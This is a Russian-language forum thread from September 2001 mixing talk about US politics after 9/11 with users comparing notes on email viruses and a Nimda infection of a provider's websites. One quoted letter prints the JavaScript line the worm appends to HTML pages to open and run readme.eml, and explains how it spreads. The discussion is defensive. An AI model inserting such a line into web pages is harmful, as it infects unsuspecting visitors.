> Ответ на сообщение, которое написал гpaфoмaн(П.3.) 21/09/2001 06:44

No kidding.
=====

Кстати ПЗ кажется Вы пропустили один из важнейших элементов в установках Буша, из числа вновь им высказанных. Он сформулировал признаки политические режимов стран, которые с наибольщей вероятностью могут оказаться теми самыми врагами, поощряющими или укрывающими террористов: нацисты, фашисты, тоталитористы. И все. Period.

Коммунистов в том черном списке не было. Впервые после речи Черчилля в Фултоне наверное такое для Америки случилось.

Имеется ввиду - предполагают комментаторы некоторые - в первую очередь чтобы Китай по внутреннюю сторону разделительной черты оказался. Ну а может - дале высказываютсЯ предположения уже более острожные - вообще демократия в разных странах как самоцель видимо потихонечку из императивов снимается.

Все что угодно, кроме концептуально террора, как метода политической и иной борьбы. Люди живут так где как могут: чем бы дитя не тешилось, лишь бы не плакало.

Серьезные может случиться что сдвиги мировоззрения - во внешней политике то уж похоже что с определенностью - намечаются. Или так оно пока что смотрится то уж всяко.

Везет все-таки иногда и Америке - хоть иногда, согласитесь ПЗ. Имею ввиду выборы последние опять же и все в той же Флориде. Вообразите на минуту в данный момент не связку Буш-Чейни, а наоброт Гор-Либерман на их месте но в той же точно ситуации. Это же абзац. Полный. При всей моей - ни раз высказывал - в человеческом плане к Гору, как и к его папеньке покойном впрочем тоже - сенатору Гору - из того что об их знаю симпатии. Но ситуация то видали уж на столько бушевская оказалась сразу после выборов, а точнее если то строго пока она остается буше-чейнивская. Та самая, что следует быть, команда, в правильное время и в правильном месте: right team, in right time, in right place.

Так что по итогам того флоридского чуда худо бедно но ощущение ныне все еще сохраняется: тяжело - заведомо - но не вечер. Еще не вечер.

> Ответ на сообщение, которое написал ЮK 21/09/2001 07:34

>Вообще-то ко мне заразы прилетали только через е-мейл.

То есть Вы открывали зааттаченные к тем имэйлам файлы - или как?

> Ответ на сообщение, которое написал Out : 21/09/2001 07:47

открывали зааттаченные к тем имэйлам файлы

Упаси боже!

Пока сам не заражался. Norton Antivirus перехватывал эти приаттаченные файлы при получении. Или их копии при сканировании, обычно уже в запакованном виде в корзине удаленных.

Однако терял время на многократное тщательное сканирование компьютера. Часа по два - по три каждый раз.

Out:

Вот и уточнение. В данном случае CNN не схалтурило. Кадры ликования палестинцев свежие. И вообще сняты не CNN, а Рейтер.

http://www.cnn.com/2001/US/09/20/cnn.statement/
впрочем, как раньше, считаю что это подробности. Настолько много картинок и сообщений о подобных ликованиях и/или более тихой радости арабов и некоторых других мусульман, скажем, пакистанцев, проходило одновременно из других источников, что истинность или халтурность одного репортажа не влияла на общую картину.

> Ответ на сообщение, которое написал U2 21/09/2001 08:33

>То есть пользователь заражается при открытии страницы сайта. Именно так мы и его и подхватили, причем со своего сайта и еще неизвестно сколько туда зашедших. Подхватил U3, обычно он отключает все активные расширения.

Вот ровно того и не пойму никак, ув. U2.

Не могли бы Вы оказаться настолько любезныи и пояснить тупому видимо в данном вопросе и совершенно. Каким образом страница может нести хоть что-то цепляемое, если джава и ActiveX в браузере отрублены?

Сам по себе HTML, JavaScript и СSS код - из чего только и может состоять страница (в случае если функции джавы и активикса исключить) - любая!!! - ничего совершить в компе не могут. Ничего. Повторяю по буквам: Николай Иван Харитон Ульяна Яков.

И соотвтественно ничем наследить потому уже и не в состоянии. Что же тогда в Вашем то случае могло быть - не подскажете?

Out 21/09/2001 07:47
>>открывали зааттаченные к тем имэйлам файлы?

ЮK 21/09/2001 07:56
>Упаси боже! ...Однако терял время на многократное тщательное сканирование компьютера. Часа по два - по три каждый раз.

Опять простите не понял. Если - "упаси боже" - то есть не открывали значит - то чего и зачем тогда было сканировать?

Поясните, пожалуйста, ЮК. А то Вы с У2 заинтриговали, а понять ту Вашу беседу видите все никак мне не удается. Вот уж и СШ тоже любезно посредничал в этих моих к вам распросам, а все никак не ухвачу в чем там была сермяга, от меня все видимо ускользающая. Спасибо.

> Ответ на сообщение, которое написал Out : 21/09/2001 10:57

Поясните, пожалуйста
Присоединяюсь к просьбе - поясните, что именно надо отключить в ИЭ и почтовике (у меня Бат), чтобы предохраниться. Из средств защиты пользую DrWeb со спайдером.
А то тут страстей нагнали - прям хоть в резиновых перчатках за комп садись.

> Ответ на сообщение, которое написал Out : 21/09/2001 10:57

Да дурят мужиков. Какая нибудь бл-дь в ихней сети, ищущая импортных кавалеров, смело вскрыла приаттаченый sseexx.exe и пошло по локалке буйство долбоебиzма.
Cвежепроверено - во всем бл-ди виноваты. И никакой мистики.

VV 21/09/2001 11:00
>Не мог же я опуститься до его уровня. Значит, это он поднялся.

Шляпник 21/09/2001 01:15
>>Давай демонстрировать козлам, что такое настоящий плюрализм.

VV 21/09/2001 11:00
>ты как хочешь, а мне к козлам рано.

Поверил Вам на слово, VV. Точне два. Две то есть. Фразы. Словом поверил. Объясней еще... Поверил и все.

Не подведите. А то народ возмущаться опять начнут. Скажут открыли тему, а там ничего нет такого чтобы уж очень. Или хоть чуть.

Удвой удой, утрой удой,
Не то пойдешь ты на убой.

> Ответ на сообщение, которое написал Out : 21/09/2001 10:47

Не могли бы Вы оказаться настолько любезныи и пояснить тупому видимо в данном вопросе и совершенно. Каким образом страница может нести хоть что-то цепляемое, если джава и ActiveX в браузере отрублены?

Аут - я не специалист именно по интернет-программированию. Общие принципы вроде знаю. Потому вчера так и встревожился, так как были предсказания, что после 22 начнется глобальные вирусные атаки.

Пока была так. Вирус каким-то образом заразил сеть провайдера. Он умеет перехватывать управление MIS (Microsoft Informstion Server) или какие-то функции. В результате он пишет в концевые страницы строку на JavaScript, которая ссылается на какой-то тоже записаный там файл *.eml - формат письма OutLock.

Поэтому, если JavaScript включен, (а он у все включен, так как это основное средство web-дизайна), то происходит запуск файла *.eml, который может содержать уже активные компоненты.
Это совершенно также, как Вы запускаете этот файл на своем компьютере.
По видимому, отключение Java и ActiveX блокирует закачку кода, явно помещенного на страницах, или явно размеченного как такой код, но никак не блокирует запуск этих машин просто в компьютере.
Потому и *eml спокойно обрабатывается, как бы обрабатывался локальный файл.

Вот тот разговор, который мы вели с Не_Пью про полностью виртуализированые среды, системы и языки программирования имеет к этому прямое отношение.
Бизнес-поток программирования смел основные культурные принципы, созданные первыми идеологами, Виртом и прочими. Аккуратное следование этим принципам порождало бы _совершенно_ надежный продукт, так программные код _никогда_ не мог бы вмешаться в работу систем верхнего слоя, ибо он ему недоступна среда чисто логически - он про нее не знает ничего.

А так мы имеем бесконечно расширяющуюся систему логических дыр, кторые нужно будет постоянно зашивать программными заплатами.

> Ответ на сообщение, которое написал VV 21/09/2001 11:15

>современное либерумствование это и не блядство и не наука, несмотря на то, что имеет свойства и того и другого?

Вы на правильном пути. Но тут конечно и Каркел тоже виноват. Его флюиды работают. И тем ни менее Ваших заслуг, VV, не умаляю. Не подумайте. Продолжайте пожалуйста.

Осень на дворе. Пора, VV, пора ...

> Out : 21/09/2001 11:24

Спасибо за краткость.

"Вы на правильном пути".

> Ответ на сообщение, которое написал U2 21/09/2001 11:24

Во во.

Потому так пристрастно и распрашивал, что в газете - тьфу ты, опять газета - тоже мельком где то такие фразы слышал про то что JavaScript чего то такое может. Как Вы пишете про то, "происходит запуск файла *.eml"

Так же как то не понЯл с газетной той заметки, так и у Вас вот никак не въеду. Что это за новая какая возможность в javaScript заведась, что опасность несет. Опять же и в газетке тоже было поминание про Outlook Express, который дескать тем скриптом в какое то баловство вгоняется.

Так что если у Вас будет повод чуть прояснить как это оно практически то все таки происходит - допустим строчку того скрипта, которая такое может - был бы признателен. Вроде бы и сам то со скриптом чего й то другой раз грешен бывает что, а про такое - не сталкивался.

То есть ничего социально опасного полагал скрипт не может и в принципе. В Нетскейпе то уж заведомо, ну а в IE конечно возможностей много больше и соотвтественно может че и не разглядел еще с того что чревато. Спасибо.

CoM 21/09/2001, 11:14
>что именно надо отключить в ИЭ и почтовике (у меня Бат), чтобы предохраниться.

Sorry, СОМ про почтовик ничего Вам видимо путевого не скажу, кроме общеизвестного - не открывайте аттачментов на рабочей машине никогда. Все.

Незнакомого источника письма вычищаются и просто без раздумий. Чтобы читать заттаченные файлы друзей и знакомых завел себе почтовую машину вне сети локальной с дайлап только независимым доступом в инет - standalone. Просто взял со свалки старую машину 486 и ее под этот мусорный отстойник использую. Пусть там хоть все вирусы мира друг друга пожирают. Не колышет.

В браузере IE заходите в tools-internet options-security-custom levels и нажимаете кнопку disable в любой строчке где видите страшные слова: java или ActiveX.

В Нетскейпе идете в edit-preference-advance и выключаете чекбокс с надписью enable java

Но это понятно для тех кто давно уже параноик на этих страстях. Потому что вероятность получить неприятности по причине, что вышеприведенного не сделаете крайне низкая, а много полезных функций в IE потеряте из-за невозможностей пользоваться ActiveX.

Что касается java то не помню, чтобы когда и кто всерьез страдал от того что отрубит ее. Хотя и пострадавших от нее то же не то чтобы толпы гуляют - редчайший случай.

Tупoй У. 21/09/2001, 11:18
>во всем бл-ди виноваты. И никакой мистики.

Вообще то эта Ваша фраза конечно сама просится в Цитату дня, так что не без боли сожаления тут Вам отвечаю.

Спасибо, ув. Tупoй У. Признателен за первое сегодня доходчивое пояснение сути обсуждаемой - как впрочем и многих иных здесь в никак не меньшей степени - проблемы. Да и вообще - безотносительно повода - рад от Вас опять весточку тут получить.

> Ответ на сообщение, которое написал VV 21/09/2001 12:00

Опять скрытое цитирование.
Вот и заводи под Вас хранилище...
А может там и не Ваши все мысли тогда?
Необходима получается что входная экспертиза.

> Ответ на сообщение, которое написал Out : 21/09/2001 12:10

Вот выдержка из письма U3 к провайдеру:

> Сегодня первый раз за последний две недели зашел на www.laser.spb.ru .
Меня
> удивило, что в конце загрузки вывалилось какое-то окошко, что-то быстро
> загрузилось и пропало. Сразу не обратил внимание. Только через два часа мы
> обнаружили, что все компьютеры заражены вирусом I-WORM NIMDA . Боролись
> дружно с вирусом часа четыре, вот сейчас вроде более менее ясно стало, что
> делать. В конце концов я зашел по ftp на laser.spb.ru и сейчас потихоньку
> лечу там страницы.
>
> Распространяется он при помощи следующей строки, которую добавляет в конец
> html-фаилов:
>
> window.open("readme.eml", null,
> "resizable=no,top=6000,left=6000")
>
> Дальше идет загрузка и запуск фаила readme.eml (поищите именно его в
первую
> очередь) на компьютере посетителя. Мне даже подумать страшно, сколько
> человек успели посетить laser.spb.ru до того, как сегодня туда зашел я.
> Несомнено, что вирус сидит у Вас на сервере.
>
> Вот только что еще обнаружил, что тот же самый вирус сидит и в
> www.stroymarket.spb.ru сейчас там буду смотреть...
>

PS: За сегодня уже получил 12 почтовых вирусов трех видов (все старье, а еще гуляет по сети). Большую часть - вот прикол - прислали из Комитета по защитным технологиям Госстандарта!!!

> Ответ на сообщение, которое написал Out : 21/09/2001 12:10

Чтобы читать заттаченные файлы друзей и знакомых завел себе почтовую машину вне сети локальной с дайлап только независимым доступом в инет - standalone. Просто взял со свалки старую машину 486 и ее под этот мусорный отстойник использую. Пусть там хоть все вирусы мира друг друга пожирают. Не колышет.

Именно, так, Уважаемый Аут! Оказывается иногда мы с Вами одинаково действуем и мыслим.:)))

Лучший способ уберечься от кражи автомобиля - ЗАП с движком от Мерса. Какой же дурень под капот к ЗАПу полезет:)))

> Ответ на сообщение, которое написал U2 21/09/2001 12:20

Спасибо большое, дорогой U2, за исчерпывающее на этот раз пояснение.

Все понял наконец-то. Как до жирафа долго шло. То есть для этого кто-то должен взломать защиту у провайдера и положить на директорию Веб сайта конторы Вашей тот пакостный файл - в Вашем случае readme.eml. Далее все зависит от типа браузера и почтаря. Нетскейпу вообще начхать на эту гадость, а IE иногда видимо окажет медвежью услугу, при условии что Outlook в почтарях.

Еще раз спасибо.

> Ответ на сообщение, которое написал U2 21/09/2001 12:20

>получил 12 почтовых вирусов ... Большую часть - вот прикол - прислали из Комитета по защитным технологиям Госстандарта!!!

Так только же ведь и ровно про такого рода каналы преимущественно их распостранения и отмечал. Все по Марксу - стекольщик мечтает про смерч, который повыбивает стекла в городе.

> Ответ на сообщение, которое написал Out : 21/09/2001 12:10

Поставьте себе почтовый серверок MDaemon c плагином MailScan (совместный продукт DeerField и Касперского ) и чекайте через него всю почту. Никаких проблем с вирусами не будет ваще. SirCam тоже обнаруживает.

> Ответ на сообщение, которое написал Cтapoвep 21/09/2001 12:20

>ЗАП с движком от Мерса.

Популярный весьма и в самых различных областях бытия камуфляж. Общее название - "котик под кошку".

> Ответ на сообщение, которое написал Out : 21/09/2001 12:41

Популярный весьма и в самых различных областях бытия камуфляж. Общее название - "котик под кошку".

Я как то нарвался на такого ... котика под кошку. Может рассказывал. На перекрестке в ряд я на Авдотье шестой, Мерин трехсотый и ЗАП. Зеленый. ЗАП как рванул... Ну нас, ес-но, задело. Полетели за ним... А он уже за сотню перевалил. Прорубил я, что тут чтой то не то - кинул гонки. А Мерин долго еще пытался. Потом как то мне показали этот ЗАП с сердцем от арабского скакуна. Мужик для "завода" публики его сварганил.